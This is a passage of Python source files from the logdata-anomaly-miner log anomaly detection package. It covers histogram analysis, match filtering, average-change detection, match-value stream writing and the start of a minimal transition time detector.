elements in this bin is. This method is used as an interface method, but it also returns a default value. @return the value or None when not applicable. """ return None class LinearNumericBinDefinition(BinDefinition): """This class defines the linear numeric bins.""" def __init__(self, lower_limit, bin_size, bin_count, outlier_bins_flag=False): self.lower_limit = lower_limit self.bin_size = bin_size self.bin_count = bin_count self.outlier_bins_flag = outlier_bins_flag self.bin_names = None self.expected_bin_ratio = 1.0 / float(bin_count) def has_outlier_bins(self): """ Report if this binning works with outlier bins, that are bins for all values outside the normal binning range. If not, outliers are discarded. When true, the outlier bins are the first and last bin. """ return self.outlier_bins_flag def get_bin_names(self): """Get the names of the bins for reporting, including the outlier bins if any.""" # Cache the names here so that multiple histograms using same BinDefinition do not use separate copies of the strings. if self.bin_names is not None: return self.bin_names self.bin_names = [] if self.outlier_bins_flag: self.bin_names.append(f'...-{self.lower_limit}]') start = self.lower_limit for bin_pos in range(1, self.bin_count + 1): end = self.lower_limit + bin_pos * self.bin_size self.bin_names.append(f'[{start}-{end}]') start = end if self.outlier_bins_flag: self.bin_names.append(f'[{start}-...') return self.bin_names def get_bin(self, value): """ Get the number of the bin this value should belong to. @return the bin number or None if the value is an outlier and outlier bins were not requested. With outliers, bin 0 is the bin with outliers below limit, first normal bin is at index 1. """ if self.outlier_bins_flag: if value < self.lower_limit: return 0 pos = int((value - self.lower_limit) / self.bin_size) if pos < self.bin_count: return pos + 1 return self.bin_count + 1 if value < self.lower_limit: return None pos = int((value - self.lower_limit) / self.bin_size) if pos < self.bin_count: return pos return None def get_bin_p_value(self, bin_pos, total_values, bin_values): """ Calculate a p-Value, how likely the observed number of elements in this bin is. @return the value or None when not applicable. """ if binomial_test is None: return None if self.outlier_bins_flag and (bin_pos == 0 or bin_pos > self.bin_count): return None return binomial_test(bin_values, total_values, self.expected_bin_ratio) class ModuloTimeBinDefinition(LinearNumericBinDefinition): """This class defines the module time bins.""" def __init__(self, modulo_value, time_unit, lower_limit, bin_size, bin_count, outlier_bins_flag=False): super(ModuloTimeBinDefinition, self).__init__(lower_limit, bin_size, bin_count, outlier_bins_flag) self.modulo_value = modulo_value self.time_unit = time_unit def get_bin(self, value): """ Get the number of the bin this value should belong to. @return the bin number or None if the value is an outlier and outlier bins were not requested. With outliers, bin 0 is the bin with outliers below limit, first normal bin is at index 1. """ if value is None: value = 0 if isinstance(value, bytes): value = int.from_bytes(value, 'big') return super(ModuloTimeBinDefinition, self).get_bin(value) if isinstance(value, str): value = int.from_bytes(value.encode(), 'big') return super(ModuloTimeBinDefinition, self).get_bin(value) time_value = (value % self.modulo_value) / self.time_unit return super(ModuloTimeBinDefinition, self).get_bin(time_value) class HistogramData: """ This class defines the properties of one histogram to create and performs the accounting and reporting. When the Python scipy package is available, reports will also include probability score created using binomial testing. """ def __init__(self, property_path, bin_definition): """Create the histogram data structures.""" self.property_path = property_path self.bin_definition = bin_definition self.bin_names = bin_definition.get_bin_names() self.bin_data = [0] * (len(self.bin_names)) self.has_outlier_bins_flag = bin_definition.has_outlier_bins() self.total_elements = 0 self.binned_elements = 0 def add_value(self, value): """Add one value to the histogram.""" bin_pos = self.bin_definition.get_bin(value) self.bin_data[bin_pos] += 1 self.total_elements += 1 if self.has_outlier_bins_flag and bin_pos != 0 and bin_pos + 1 != len(self.bin_names): self.binned_elements += 1 def reset(self): """Remove all values from this histogram.""" self.total_elements = 0 self.binned_elements = 0 self.bin_data = [0] * len(self.bin_data) def clone(self): """ Clone this object so that calls to add_value do not influence the old object anymore. This behavior is a mixture of shallow and deep copy. """ histogram_data = HistogramData(self.property_path, self.bin_definition) histogram_data.bin_names = self.bin_names histogram_data.bin_data = self.bin_data[:] histogram_data.total_elements = self.total_elements histogram_data.binned_elements = self.binned_elements return histogram_data def to_string(self, indent): """Get a string representation of this histogram.""" result = f'{indent}Property "{self.property_path}" ({self.total_elements} elements):' f_elements = float(self.total_elements) base_element = self.binned_elements if self.has_outlier_bins_flag else self.total_elements for bin_pos, count in enumerate(self.bin_data): if count == 0: continue p_value = self.bin_definition.get_bin_p_value(bin_pos, base_element, count) if p_value is None: # skipcq: PYL-C0209 result += '\n%s* %s: %d (ratio = %.2e)' % (indent, self.bin_names[bin_pos], count, float(count) / f_elements) else: # skipcq: PYL-C0209 result += '\n%s* %s: %d (ratio = %.2e, p = %.2e)' % \ (indent, self.bin_names[bin_pos], count, float(count) / f_elements, p_value) return result class HistogramAnalysis(AtomHandlerInterface, TimeTriggeredComponentInterface): """This class creates a histogram for one or more properties extracted from a parsed atom.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, histogram_definitions, report_interval, anomaly_event_handlers, reset_after_report_flag=True, persistence_id='Default', output_logline=True): """ Initialize the analysis component. @param aminer_config configuration from analysis_context. @param histogram_definitions a list of tuples containing the target property path to analyze and the BinDefinition to apply. @param report_interval delay in seconds before re-reporting. The parameter is applied to the parsed record data time, not the system time. Hence, reports can be delayed when no data is received. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param reset_after_report_flag reset the histogram data after reporting. @param persistence_id name of persistence file. @param output_logline specifies whether the full parsed log atom should be provided in the output. """ self.next_persist_time, self.log_success, self.log_total = [None]*3 super().__init__( aminer_config=aminer_config, histogram_definitions=histogram_definitions, report_interval=report_interval, anomaly_event_handlers=anomaly_event_handlers, reset_after_report_flag=reset_after_report_flag, persistence_id=persistence_id, output_logline=output_logline ) self.last_report_time = None self.next_report_time = 0.0 self.histogram_data = [] for (path, bin_definition) in histogram_definitions: self.histogram_data.append(HistogramData(path, bin_definition)) self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: msg = 'No data reading, def merge yet' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) def receive_atom(self, log_atom): """Receive a log atom from a source.""" self.log_total += 1 match_dict = log_atom.parser_match.get_match_dictionary() for data_item in self.histogram_data: match = match_dict.get(data_item.property_path, None) if match is None: continue self.log_success += 1 data_item.add_value(match.match_object) timestamp = log_atom.get_timestamp() if timestamp is None: timestamp = time.time() if self.next_report_time < timestamp: if self.last_report_time is None: self.last_report_time = timestamp self.next_report_time = timestamp + self.report_interval else: self.send_report(log_atom, timestamp) def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.'", self.__class__.__name__) def send_report(self, log_atom, timestamp): """Send a report to the event handlers.""" report_str = 'Histogram report ' if self.last_report_time is not None: report_str += f'from {datetime.fromtimestamp(self.last_report_time).strftime(date_string)} ' report_str += f'till {datetime.fromtimestamp(timestamp).strftime(date_string)}' affected_log_atom_paths = [] analysis_component = {'AffectedLogAtomPaths': affected_log_atom_paths} for histogramData in self.histogram_data: affected_log_atom_paths.append(histogramData.property_path) res = [] h = [] for data_item in self.histogram_data: d = {} bins = {} i = 0 while i < len(data_item.bin_names): bins[data_item.bin_names[i]] = data_item.bin_data[i] i = i + 1 d['TotalElements'] = data_item.total_elements d['BinnedElements'] = data_item.binned_elements d['HasOutlierBinsFlag'] = data_item.has_outlier_bins_flag d['Bins'] = bins if self.output_logline: bin_definition = { 'Type': str(data_item.bin_definition.__class__.__name__), 'LowerLimit': data_item.bin_definition.lower_limit, 'BinSize': data_item.bin_definition.bin_size, 'BinCount': data_item.bin_definition.bin_count, 'OutlierBinsFlag': data_item.bin_definition.outlier_bins_flag, 'BinNames': data_item.bin_definition.bin_names, 'ExpectedBinRatio': data_item.bin_definition.expected_bin_ratio} if isinstance(data_item.bin_definition, ModuloTimeBinDefinition): bin_definition['ModuloValue'] = data_item.bin_definition.modulo_value bin_definition['TimeUnit'] = data_item.bin_definition.time_unit d['BinDefinition'] = bin_definition d['PropertyPath'] = data_item.property_path for line in data_item.to_string(' ').split('\n'): report_str += os.linesep + line res += [''] * data_item.total_elements h.append(d) analysis_component['HistogramData'] = h analysis_component['ReportInterval'] = self.report_interval analysis_component['ResetAfterReportFlag'] = self.reset_after_report_flag event_data = {'AnalysisComponent': analysis_component} if len(res) > 0: res[0] = report_str for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'Histogram report', res, event_data, log_atom, self) if self.reset_after_report_flag: for data_item in self.histogram_data: data_item.reset() self.last_report_time = timestamp self.next_report_time = timestamp + self.report_interval logging.getLogger(DEBUG_LOG_NAME).debug("%s sent report.", self.__class__.__name__) class PathDependentHistogramAnalysis(AtomHandlerInterface, TimeTriggeredComponentInterface): """ This class provides a histogram analysis for only one property but separate histograms for each group of correlated match paths. Assume there two paths that include the requested property but they separate after the property was found on the path. Then objects of this class will produce 3 histograms: one for common path part including all occurences of the target property and one for each separate subpath, counting only those property values where the specific subpath was followed. """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, target_path, bin_definition, report_interval, anomaly_event_handlers, reset_after_report_flag=True, persistence_id='Default', output_logline=True): """ Initialize the analysis component. @param aminer_config configuration from analysis_context. @param target_path the path to be analyzed in the parser match of the log atom. @param bin_definition the bin definition (LinearNumericBinDefinition, ModuloTimeBinDefinition) to be used. @param report_interval delay in seconds before re-reporting. The parameter is applied to the parsed record data time, not the system time. Hence, reports can be delayed when no data is received. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param reset_after_report_flag reset the histogram data after reporting. @param persistence_id name of persistence file. @param output_logline specifies whether the full parsed log atom should be provided in the output. """ # avoid "defined outside init" issue self.next_persist_time, self.log_success, self.log_total = [None]*3 super().__init__( aminer_config=aminer_config, target_path=target_path, bin_definition=bin_definition, report_interval=report_interval, anomaly_event_handlers=anomaly_event_handlers, reset_after_report_flag=reset_after_report_flag, persistence_id=persistence_id, output_logline=output_logline ) self.last_report_time = None self.next_report_time = 0.0 self.bin_definition = bin_definition self.histogram_data = {} self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: msg = 'No data reading, def merge yet' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) def receive_atom(self, log_atom): """Receive a log atom from a source.""" self.log_total += 1 match_dict = log_atom.parser_match.get_match_dictionary() match = match_dict.get(self.target_path, None) if match is None: return match_value = match.match_object all_path_set = set(match_dict.keys()) unmapped_path = [] missing_paths = set() while all_path_set: path = all_path_set.pop() histogram_mapping = self.histogram_data.get(path) if histogram_mapping is None: unmapped_path.append(path) continue # So the path is already mapped to one histogram. See if all paths to the given histogram are still in all_path_set. If not, # a split within the mapping is needed. clone_set = all_path_set.copy() mapped_path = None for mapped_path in histogram_mapping[0]: try: clone_set.remove(mapped_path) # skipcq: FLK-E722 except: if mapped_path != path: missing_paths.add(mapped_path) if not missing_paths: # Everything OK, just add the value to the mapping. match = match_dict.get(mapped_path, None) match_value = match.match_object if isinstance(match.match_object, bytes): match.match_object = match.match_object.decode(AminerConfig.ENCODING) histogram_mapping[1].target_path = mapped_path histogram_mapping[1].add_value(match_value) histogram_mapping[2] = log_atom.parser_match else: # We need to split the current set here. Keep the current statistics for all the missingPaths but clone the data for the # remaining paths. new_histogram = histogram_mapping[1].clone() match = match_dict.get(mapped_path, None) match_value = match.match_object histogram_mapping[1].target_path = mapped_path new_histogram.add_value(match_value) new_path_set = histogram_mapping[0] - missing_paths new_histogram_mapping = [new_path_set, new_histogram, log_atom.parser_match] for mapped_path in new_path_set: self.histogram_data[mapped_path] = new_histogram_mapping histogram_mapping[0] = missing_paths missing_paths = set() if unmapped_path: histogram = HistogramData(self.target_path, self.bin_definition) histogram.add_value(match_value) new_record = [set(unmapped_path), histogram, log_atom.parser_match] for path in unmapped_path: new_record[1].property_path = path self.histogram_data[path] = new_record timestamp = log_atom.get_timestamp() if timestamp is None: timestamp = time.time() if self.next_report_time < timestamp: if self.last_report_time is None: self.last_report_time = timestamp self.next_report_time = timestamp + self.report_interval else: self.send_report(log_atom, timestamp) self.log_success += 1 def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def send_report(self, log_atom, timestamp): """Send report to event handlers.""" report_str = 'Path histogram report ' if self.last_report_time is not None: report_str += f'from {datetime.fromtimestamp(self.last_report_time).strftime(date_string)} ' report_str += f'till {datetime.fromtimestamp(timestamp).strftime(date_string)}' all_path_set = set(self.histogram_data.keys()) analysis_component = {'AffectedLogAtomPaths': list(all_path_set)} res = [] h = [] while all_path_set: d = {} path = all_path_set.pop() histogram_mapping = self.histogram_data.get(path) data_item = histogram_mapping[1] bins = {} i = 0 while i < len(data_item.bin_names): bins[data_item.bin_names[i]] = data_item.bin_data[i] i = i + 1 d['TotalElements'] = data_item.total_elements d['BinnedElements'] = data_item.binned_elements d['HasOutlierBinsFlag'] = data_item.has_outlier_bins_flag d['Bins'] = bins if self.output_logline: bin_definition = { 'Type': str(data_item.bin_definition.__class__.__name__), 'LowerLimit': data_item.bin_definition.lower_limit, 'BinSize': data_item.bin_definition.bin_size, 'BinCount': data_item.bin_definition.bin_count, 'OutlierBinsFlag': data_item.bin_definition.outlier_bins_flag, 'BinNames': data_item.bin_definition.bin_names, 'ExpectedBinRatio': data_item.bin_definition.expected_bin_ratio} if isinstance(data_item.bin_definition, ModuloTimeBinDefinition): bin_definition['ModuloValue'] = data_item.bin_definition.modulo_value bin_definition['TimeUnit'] = data_item.bin_definition.time_unit d['BinDefinition'] = bin_definition d['PropertyPath'] = data_item.target_path # skipcq: PYL-C0209 report_str += os.linesep + 'Path values "%s":' % '", "'.join(histogram_mapping[0]) if isinstance(histogram_mapping[2].match_element.match_string, bytes): histogram_mapping[2].match_element.match_string = histogram_mapping[2].match_element.match_string.decode( AminerConfig.ENCODING) report_str += os.linesep + f'Example: {histogram_mapping[2].match_element.match_string}' if len(res) < histogram_mapping[1].total_elements: res = [''] * histogram_mapping[1].total_elements for line in histogram_mapping[1].to_string(' ').split('\n'): report_str += os.linesep + f'{line}' if len(res) > 0: res[0] = report_str all_path_set.discard(path) h.append(d) analysis_component['MissingPaths'] = list(histogram_mapping[0]) analysis_component['HistogramData'] = h analysis_component['ReportInterval'] = self.report_interval analysis_component['ResetAfterReportFlag'] = self.reset_after_report_flag event_data = {'AnalysisComponent': analysis_component} if self.reset_after_report_flag: histogram_mapping[1].reset() for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'Histogram report', res, event_data, log_atom, self) self.last_report_time = timestamp self.next_report_time = timestamp + self.report_interval logging.getLogger(DEBUG_LOG_NAME).debug("%s sent report.", self.__class__.__name__) logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/MatchFilter.py000066400000000000000000000075301437606560100336130ustar00rootroot00000000000000"""This module defines a filter for parsed paths and values. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.AminerConfig import CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig class MatchFilter(AtomHandlerInterface): """This class creates events for specified paths and values.""" def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, target_value_list=None, output_logline=True): """ Initialize the detector. @param aminer_config configuration from analysis_context. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param target_value_list if not None, only match log atom if the match value is contained in the list. @param output_logline specifies whether the full parsed log atom should be provided in the output. """ # avoid "defined outside init" issue self.next_persist_time, self.log_success, self.log_total = [None]*3 super().__init__( aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers, target_value_list=target_value_list, output_logline=output_logline ) self.persistence_id = 'Not persisted' def receive_atom(self, log_atom): """Forward all log atoms that involve specified path and optionally value.""" self.log_total += 1 match_dict = log_atom.parser_match.get_match_dictionary() for target_path in self.target_path_list: match = match_dict.get(target_path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): affected_log_atom_values = match.match_object.decode(AminerConfig.ENCODING) else: affected_log_atom_values = match.match_object if self.target_value_list is not None and affected_log_atom_values not in self.target_value_list: continue try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) analysis_component = {'AffectedLogAtomPaths': [target_path], 'AffectedLogAtomValues': [str(affected_log_atom_values)]} sorted_log_lines = [original_log_line_prefix + data] event_data = {'AnalysisComponent': analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event( f'Analysis.{self.__class__.__name__}', 'Log Atom Filtered', sorted_log_lines, event_data, log_atom, self) self.log_success += 1 MatchValueAverageChangeDetector.py000066400000000000000000000254751437606560100374660ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines a detector that reports diverges from an average. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time import os import logging from aminer.AminerConfig import build_persistence_file_name, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, DEBUG_LOG_NAME from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class MatchValueAverageChangeDetector(AtomHandlerInterface, TimeTriggeredComponentInterface): """ This detector calculates the average of a given list of values to monitor. Reports are generated if the average of the latest diverges significantly from the values observed before. """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, timestamp_path, target_path_list, min_bin_elements, min_bin_time, debug_mode=False, persistence_id='Default', output_logline=True): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param timestamp_path if not None, use this path value for timestamp based bins. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param min_bin_elements evaluate the latest bin only after at least that number of elements was added to it. @param min_bin_time evaluate the latest bin only when the first element is received after min_bin_time has elapsed. @param debug_mode if true, generate an analysis report even when average of last bin was within expected range. @param persistence_id name of persistence file. @param output_logline specifies whether the full parsed log atom should be provided in the output. """ # avoid "defined outside init" issue self.next_persist_time, self.log_success, self.log_total = [None] * 3 super().__init__( aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, timestamp_path=timestamp_path, target_path_list=target_path_list, min_bin_elements=min_bin_elements, min_bin_time=min_bin_time, debug_mode=debug_mode, persistence_id=persistence_id, output_logline=output_logline ) self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) self.stat_data = [] for path in target_path_list: self.stat_data.append((path, [],)) if persistence_data is not None: for val in persistence_data: if isinstance(val, str): val = val.strip('[').strip(']').split(',', 2) path = val[0].strip('"') values = val[1].strip(' ').strip('[').strip(']') else: path = val[0] values = val[1] index = 0 for p, _ in self.stat_data: if p == path: break index += 1 for value in values: self.stat_data[index][1].append(value) def receive_atom(self, log_atom): """Send summary to all event handlers.""" self.log_total += 1 parser_match = log_atom.parser_match value_dict = parser_match.get_match_dictionary() timestamp_value = log_atom.get_timestamp() if self.timestamp_path is not None: match_value = value_dict.get(self.timestamp_path) if match_value is None: return timestamp_value = match_value.match_object event_data = {'MatchValue': match_value.match_object} analysis_summary = '' ready_for_analysis_flag = True for (path, stat_data) in self.stat_data: match = value_dict.get(path) if match is None: ready_for_analysis_flag = (ready_for_analysis_flag and self.update(stat_data, timestamp_value, None)) else: if isinstance(match, list): data = [] for m in match: data.append(m.match_object) else: data = match.match_object ready_for_analysis_flag = (ready_for_analysis_flag and self.update(stat_data, timestamp_value, data)) if ready_for_analysis_flag: anomaly_scores = [] for (path, stat_data) in self.stat_data: analysis_data = self.analyze(stat_data) if analysis_data is not None: d = {'Path': path} a = {} new = {'N': analysis_data[1], 'Avg': analysis_data[2], 'Var': analysis_data[3]} old = {'N': analysis_data[4], 'Avg': analysis_data[5], 'Var': analysis_data[6]} a['New'] = new a['Old'] = old d['AnalysisData'] = a if analysis_summary == '': analysis_summary += f'"{path}": {analysis_data[0]}' else: analysis_summary += os.linesep analysis_summary += f' "{path}": {analysis_data[0]}' anomaly_scores.append(d) analysis_component = {'AffectedLogAtomPaths': list(value_dict), 'AnomalyScores': anomaly_scores, 'MinBinElements': self.min_bin_elements, 'MinBinTime': self.min_bin_time, 'DebugMode': self.debug_mode} event_data = {'AnalysisComponent': analysis_component} if analysis_summary: res = [''] * stat_data[2][0] res[0] = analysis_summary for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'Statistical data report', res, event_data, log_atom, self) self.log_success += 1 def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" PersistenceUtil.store_json(self.persistence_file_name, self.stat_data) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def update(self, stat_data, timestamp_value, value): """ Update the collected statistics data. @param value if value not None, check only conditions if current bin is full enough. @return true if the bin is full enough to perform an analysis. """ if value is not None: if not stat_data: # Append timestamp, k-value, old-bin (n, sum, sum2, avg, variance), # current-bin (n, sum, sum2) stat_data.append(timestamp_value) stat_data.append(value) stat_data.append(None) stat_data.append((1, 0.0, 0.0,)) else: delta = value - stat_data[1] bin_values = stat_data[3] stat_data[3] = (bin_values[0] + 1, bin_values[1] + delta, bin_values[2] + delta * delta) if not stat_data: return False if stat_data[3][0] < self.min_bin_elements: return False if self.timestamp_path is not None: return timestamp_value - stat_data[0] >= self.min_bin_time return True def analyze(self, stat_data): """ Perform the analysis and progress from the last bin to the next one. @return None when statistical data was as expected and debugging is disabled. """ logging.getLogger(DEBUG_LOG_NAME).debug("%s performs analysis.", self.__class__.__name__) current_bin = stat_data[3] current_average = current_bin[1] / current_bin[0] current_variance = (current_bin[2] - (current_bin[1] * current_bin[1]) / current_bin[0]) / (current_bin[0] - 1) # Append timestamp, k-value, old-bin (n, sum, sum2, avg, variance), # current-bin (n, sum, sum2) old_bin = stat_data[2] if old_bin is None: stat_data[2] = (current_bin[0], current_bin[1], current_bin[2], current_average, current_variance,) stat_data[3] = (0, 0.0, 0.0) if self.debug_mode: return f'Initial: n = {current_bin[0]}, avg = {current_average + stat_data[1]}, var = {current_variance}' else: total_n = old_bin[0] + current_bin[0] total_sum = old_bin[1] + current_bin[1] total_sum2 = old_bin[2] + current_bin[2] stat_data[2] = ( total_n, total_sum, total_sum2, total_sum / total_n, (total_sum2 - (total_sum * total_sum) / total_n) / (total_n - 1)) stat_data[3] = (0, 0.0, 0.0) if (current_variance > 2 * old_bin[4]) or (abs(current_average - old_bin[3]) > old_bin[4]) or self.debug_mode: res = [f'Change: new: n = {current_bin[0]}, avg = {current_average + stat_data[1]}, var = {current_variance}; old: n = ' f'{old_bin[0]}, avg = {old_bin[3] + stat_data[1]}, var = { old_bin[4]}', current_bin[0], current_average + stat_data[1], current_variance, old_bin[0], old_bin[3] + stat_data[1], old_bin[4]] return res return None MatchValueStreamWriter.py000066400000000000000000000073021437606560100357310ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines a writer that forwards match information to a stream. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface import _io class MatchValueStreamWriter(AtomHandlerInterface, TimeTriggeredComponentInterface): """ This class extracts values from a given match and writes them to a stream. This can be used to forward these values to another program (when stream is a wrapped network socket) or to a file for further analysis. A stream is used instead of a file descriptor to increase performance. To flush it from time to time, add the writer object also to the time trigger list. """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, stream, target_path_list, separator, missing_value_string): """ Initialize the writer. @param stream the stream on which the match results are written. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param separator a string to be added between match values in the output stream. @param missing_value_string a string which is added if no match was found. """ # avoid "defined outside init" issue self.log_success, self.log_total = [None]*2 super().__init__(stream=stream, target_path_list=target_path_list, separator=separator, missing_value_string=missing_value_string) def receive_atom(self, log_atom): """Forward match value information to the stream.""" self.log_total += 1 match_dict = log_atom.parser_match.get_match_dictionary() add_sep_flag = False contains_data = False result = b'' for path in self.target_path_list: if add_sep_flag: result += self.separator match = match_dict.get(path) if match is None: result += self.missing_value_string else: matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: result += match.match_string + self.separator contains_data = True if len(self.separator) > 0: result = result[:-len(self.separator)] add_sep_flag = True if contains_data: if not isinstance(self.stream, _io.BytesIO): self.stream.write(result.decode('ascii', 'ignore')) self.stream.write('\n') else: self.stream.write(result) self.stream.write(b'\n') self.log_success += 1 def do_timer(self, _trigger_time): """Flush the timer.""" self.stream.flush() return 10 def do_persist(self): """Flush the timer.""" self.stream.flush() MinimalTransitionTimeDetector.py000066400000000000000000000772561437606560100373200ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines an detector for minimal transition times between states (e.g. value combinations of stated paths). This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import logging import sys import time from aminer.AminerConfig import DEBUG_LOG_NAME, build_persistence_file_name, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX,\ KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class MinimalTransitionTimeDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface): """This class creates events when minimal transition times between states (e.g. value combinations of stated paths) are undercut.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, target_path_list=None, id_path_list=None, ignore_list=None, allow_missing_id=False, num_log_lines_solidify_matrix=100, time_output_threshold=0, anomaly_threshold=0.05, persistence_id='Default', learn_mode=False, output_logline=True, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. @param id_path_list the list of paths where id values can be stored in all relevant log event types. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable. @param allow_missing_id specifies whether log atoms without id path should be omitted 